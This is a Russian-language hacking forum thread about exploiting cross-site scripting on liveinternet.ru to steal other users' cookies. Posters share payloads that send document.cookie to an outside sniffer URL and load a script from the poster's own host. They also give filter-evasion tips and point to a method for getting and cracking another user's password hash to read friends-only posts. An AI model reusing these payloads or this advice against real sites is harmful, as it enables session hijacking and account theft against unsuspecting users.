найдено D=P=CH= MOD=
http://www.liveinternet.ru/add

Вводим
"><script>alert("xss")</script>

алерт работает!
Но КУКИ не приходят!!!!
Хотя ввожу в поле "Ключевые слова" все верно:
"<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">
либо
"<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и даже этим способом:
"<srcipt src=http://мой_сайт.ru/js.js></script>

Пробую "регить сайт", заходя со своего акка.
Не приходят, мать их!!!

Не понимаю, в чем дело? Подскажите!

Может изза браузера.

проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта...
если ничо не путаю.. давно это было

Все работает.
Просто пытаются фильтровать "="
Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях.
Вариант со скриптом на собственном хосте прекрасно прокатывает.
Тема исчерпана.

А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как.

Очень надо.

Заранее спасибо.

http://forum.antichat.ru/thread29020.html
получишь хеш пароля в md5(вроде бы)
потом расшифруешь пароль и зайдешь...